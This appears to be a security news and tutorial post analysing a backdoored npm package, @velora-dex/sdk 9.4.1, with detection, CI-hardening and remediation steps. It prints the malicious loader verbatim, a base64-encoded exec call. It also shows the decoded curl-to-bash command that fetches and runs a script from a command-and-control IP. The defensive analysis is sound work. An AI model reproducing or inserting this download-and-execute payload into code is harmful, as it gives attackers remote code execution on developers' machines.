“Velora SDK Backdoor: The npm Supply Chain Attack That Executes Malicious Code Automatically” + Video

By /

Listen to this Post

Featured Image

Introduction

Software supply chain attacks have become one of the most insidious threats in modern cybersecurity, targeting the trusted dependencies that developers integrate into their applications. The recent compromise of the npm package @velora-dex/sdk version 9.4.1—discovered during a security audit on April 8, 2026—demonstrates how a single malicious package can provide attackers with arbitrary code execution on any system where it is installed, using base64-obfuscated payloads that download and execute remote shell scripts from a command-and-control server at 89.36.224.5.

Learning Objectives

  • Understand the technical mechanics of the Velora SDK supply chain attack and how malicious code is injected into npm packages
  • Learn to detect compromised dependencies using static analysis, runtime monitoring, and specialized security scanners
  • Implement defensive strategies including package integrity verification, pre-installation scanning, and CI/CD pipeline hardening

You Should Know

  1. Anatomy of the Velora SDK Attack: From Obfuscation to Remote Code Execution

The compromised package @velora-dex/sdk version 9.4.1 contained malicious code embedded directly in the package entry point at `dist/index.js` (lines 4-5). Out of 15 versions analyzed, only 9.4.1 was compromised—development versions 9.4.1-dev.1 and 9.4.1-dev.2 remained clean, suggesting a build pipeline compromise rather than a source repository breach. The malicious payload executes automatically upon package import, requiring no user interaction beyond installing the dependency.

Step-by-step guide to analyzing the malicious payload:

  1. Extract the obfuscated payload from the compromised package: 
    Download the malicious package version for analysis
npm pack @velora-dex/[email protected]
tar -xzf velora-dex-sdk-9.4.1.tgz
cat package/dist/index.js

  2. Decode the base64 payload (original payload from the compromised package):

    // The malicious code observed in the wild:
const {exec} = require('child_process');
exec(<code>echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash</code>, function(error, stdout, stderr) {});

  3. Decode the base64 string to reveal the actual command:

    echo "bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx" | base64 --decode

    Output: `nohup bash -c “$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)” > /dev/null 2>&1`

4. Understand the attack flow:

  • Node.js spawns a child process using `child_process.exec()`
    – The base64-encoded command is decoded using GNU base64 (--decode) or macOS base64 (-D) for cross-platform compatibility
    – `curl -fsSL` silently fetches a shell script from the C2 server at IP 89.36.224.5
  • The downloaded script executes with `bash`
    – `nohup` ensures the process continues even if the parent terminates
  • All output is redirected to `/dev/null` to evade detection
  1. Detecting Compromised npm Packages with Static Analysis Tools

Proactive detection of malicious npm packages requires specialized scanning tools that analyze package contents before installation. Several open-source solutions have emerged following large-scale supply chain attacks like Shai-Hulud and the Velora incident.

Step-by-step guide using Aegis—a supply-chain security scanner:

 Installation from crates.io
cargo install aegis-scan

Or from source
git clone https://github.com/z8run/aegis.git
cd aegis
cargo install --path .

Check a specific package before installation
aegis-scan check @velora-dex/[email protected]

Scan an entire project directory
aegis-scan scan ./my-project --skip-dev

Install packages with security verification
aegis-scan install axios express

Generate SARIF output for CI/CD integration
aegis-scan check lodash --sarif

Aegis detects multiple attack patterns: eval() execution, child_process spawning, suspicious postinstall scripts, base64 obfuscation, high-entropy strings, typosquatting, and known CVEs via OSV.dev. It assigns risk scores from 0-10, with scores above 7 indicating “DO NOT INSTALL”.

Alternative: chain-audit for offline scanning

 Install chain-audit (zero-dependency heuristic scanner)
npm install -g chain-audit

Scan existing node_modules for supply chain attacks
chain-audit scan ./node_modules

Check for malicious install scripts and network access patterns
chain-audit audit --detect-network

Chain-audit detects malicious install scripts, network access attempts, environment variable exfiltration, lockfile integrity violations, obfuscated code, and suspicious patterns entirely offline.

  1. Runtime Detection and Incident Response for Compromised Dependencies

When a malicious package has already been installed, runtime monitoring becomes critical for identifying unauthorized processes, network connections, and file system modifications. The Velora SDK attack executed silently with output redirected to /dev/null, making traditional logging insufficient.

Step-by-step guide for Linux runtime detection using auditd and Sysmon:

 Monitor for curl/wget processes downloading from suspicious IPs
auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/curl -k suspect_c2
auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/wget -k suspect_c2

Monitor for bash execution of downloaded scripts
auditctl -a always,exit -F arch=b64 -S execve -F path=/bin/bash -k script_exec

Check for network connections to the known malicious IP
ss -tanp | grep 89.36.224.5
netstat -anp | grep 89.36.224.5

Search for the malicious payload in package.json and node_modules
grep -r "89.36.224.5" node_modules/ 2>/dev/null
find node_modules -name ".js" -exec grep -l "base64 --decode" {} \;

Monitor for nohup processes running in the background
ps aux | grep nohup
lsof -i @89.36.224.5

Windows runtime detection using PowerShell and Sysmon:

 Check for established connections to the C2 server
Get-NetTCPConnection -RemoteAddress 89.36.224.5

Search for the malicious IP in node_modules
Get-ChildItem -Path .\node_modules -Recurse -Include .js | Select-String "89.36.224.5"

Check for recently created suspicious processes
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$<em>.Id -eq 1 -and $</em>.Message -match "curl|wget|bash"}

Monitor for base64 decode operations
Get-ChildItem -Path .\node_modules -Recurse -Include .js | Select-String "base64 --decode|base64 -D"

The MITRE ATT&CK framework categorizes this attack pattern under DET0009: “Supply-chain tamper in dependencies/dev-tools,” where package managers download and restore content, followed by lifecycle hooks executing shell commands and establishing network egress to non-approved registries.

4. CI/CD Pipeline Hardening Against Supply Chain Attacks

Continuous Integration and Deployment pipelines are prime targets for supply chain attacks, as compromised dependencies can inject malicious GitHub Actions workflows, register self-hosted runner backdoors, and exfiltrate cloud credentials. The Shai-Hulud 2.0 campaign demonstrated propagation rates of ~1,000 new repositories every 30 minutes, affecting over 25,000 repositories across approximately 500 GitHub users.

Step-by-step guide for CI/CD hardening:

1. Pin dependency versions and use integrity verification:

// package.json with exact versions and integrity hashes
{
"dependencies": {
"@velora-dex/sdk": "9.4.2"
}
}

2. Implement npm package integrity checking in CI:

 Generate integrity hashes for all dependencies
npm audit signatures

Verify package integrity before installation
npm install --package-lock-only
npm ci --ignore-scripts
  1. Use ssafe as a secure npm wrapper in GitHub Actions: 
    name: Secure Dependency Installation
on: [bash]
jobs:
build:
runs-on: ubuntu-latest
steps:</li>
</ol>

- uses: actions/checkout@v4
- name: Install ssafe
run: npm install -g ssafe
- name: Install dependencies with security check
run: ssafe install
- name: Scan for compromised packages
run: ssafe scan --directory .

    4. Block lifecycle script execution during CI:

     Install without running preinstall/postinstall scripts
npm install --ignore-scripts

For production deployments
npm ci --ignore-scripts

    5. Monitor GitHub audit logs for suspicious activity:

    • Track rapid npm publishing events
    • Alert on workflow YAML writes under `.github/workflows`
      – Monitor self-hosted runner registrations
    • Detect cloud credential file access patterns

    5. Post-Compromise Remediation and Forensic Analysis

    If a compromised package like @velora-dex/[email protected] has been installed, immediate remediation is required to prevent attacker persistence and lateral movement.

    Step-by-step remediation guide:

    1. Identify all instances of the compromised package:

     Find all projects using the vulnerable version
find / -name "package.json" -exec grep -l "@velora-dex/sdk.9.4.1" {} \; 2>/dev/null

Check npm global installations
npm list -g --depth=0 | grep "@velora-dex/sdk"
    1. Remove the compromised package and update to the patched version: 
      Remove the malicious package
npm uninstall @velora-dex/sdk

Install the remediated version (9.4.2)
npm install @velora-dex/[email protected]

    2. Terminate any processes spawned by the malicious payload:

      Find and kill processes connecting to the C2 server
sudo lsof -i @89.36.224.5
sudo kill -9 <PID>

Kill nohup processes running suspicious scripts
ps aux | grep -E "nohup.bash.curl.89.36.224.5"
sudo pkill -f "89.36.224.5"

    4. Rotate all credentials exposed during the compromise:

    • Environment variables and API keys stored in the project
    • npm tokens and GitHub personal access tokens
    • Cloud provider credentials (AWS, GCP, Azure)
    • Database connection strings and secrets

    5. Conduct forensic analysis of executed commands:

     Check bash history for downloaded script execution
cat ~/.bash_history | grep -E "curl.89.36.224.5|base64"

Examine system logs for the attack timeframe
journalctl --since "2026-04-07" --until "2026-04-09" | grep -E "curl|89.36.224.5"

Check for scheduled tasks or cron jobs added by the malware
crontab -l
ls -la /etc/cron

    What Undercode Say

    • Supply chain attacks exploit trust, not vulnerabilities. The Velora SDK compromise succeeded because developers trusted the npm registry and the package maintainer’s build pipeline. No zero-day exploit was required—only a compromised build process.

    • Automated execution on import is a design flaw in package managers. The ability for npm packages to execute arbitrary code immediately upon import (without user consent) is the root cause enabling this attack class. The industry must reconsider lifecycle hook policies.

    The Velora SDK incident is not an isolated event but part of a growing pattern of sophisticated supply chain attacks targeting the JavaScript ecosystem. Following the Shai-Hulud worm (September 2025), which affected hundreds of npm packages and spread like a self-replicating worm, and the Axios compromise (March 2026), attackers have refined their techniques to include build pipeline compromises rather than just maintainer account takeovers. The fact that development versions remained clean while the production build was compromised indicates attackers gained access to the CI/CD infrastructure—a more difficult but far more damaging vector that evades source code reviews entirely.

    Organizations must shift from reactive patching to proactive supply chain security: implement pre-installation scanning with tools like Aegis or ssafe, enforce `–ignore-scripts` in CI pipelines, monitor runtime behavior of dependencies, and maintain strict integrity verification for all third-party packages. The attack surface has expanded beyond traditional vulnerabilities to include the very tools and processes developers rely on daily.

    Prediction

    The Velora SDK attack signals an acceleration toward build pipeline compromises as the preferred vector for supply chain attacks. Unlike maintainer credential theft, which can be mitigated with multi-factor authentication, build pipeline compromises grant attackers the ability to inject malicious code after source code reviews have passed but before packages are published to registries. In the next 12-24 months, expect to see an increase in attacks targeting GitHub Actions self-hosted runners, npm publish tokens stored in CI secrets, and third-party build services. The npm ecosystem will likely introduce mandatory integrity verification and sandboxed installation modes as standard features, while organizations will adopt zero-trust principles for dependency management—treating every package as potentially malicious until proven otherwise.

    ▶️ Related Video (82% Match):

    🎯Let’s Practice For Free:

    IT/Security Reporter URL:

    Reported By: Velora Sdk – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: